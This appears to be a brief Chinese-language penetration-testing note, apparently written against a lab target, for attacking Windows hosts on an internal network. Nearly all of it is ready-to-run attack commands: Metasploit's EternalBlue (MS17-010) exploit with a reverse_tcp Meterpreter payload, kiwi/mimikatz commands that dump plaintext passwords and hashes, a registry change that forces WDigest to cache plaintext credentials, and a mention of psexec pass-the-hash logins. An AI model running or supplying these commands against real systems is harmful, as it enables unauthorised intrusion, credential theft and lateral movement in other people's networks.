实验用的是靶机仅供参考
内网渗透 ms17_010_eternalblue 永恒之蓝 获取权限
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 10.10.10.136
set lport 4444
exploit
内网渗透 获取hash和明文
在最新的版本中load mimikatz已经取消 现在使用kiwi模块
load kiwi
creds_all #该命令可以列举系统中的明文密码
kiwi_cmd
kiwi_cmd 模块可以让我们使用mimikatz的全部功能,该命令后面接 mimikatz.exe 的命令
kiwi_cmd sekurlsa::logonpasswords
在Windows2012系统及以上的系统,默认在内存缓存中禁止保存明文密码的。攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取。
攻击:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
内网渗透 psexec
在metasploite中存在一个psexec模块可以使用获取的hash进行登录
未完待续。。。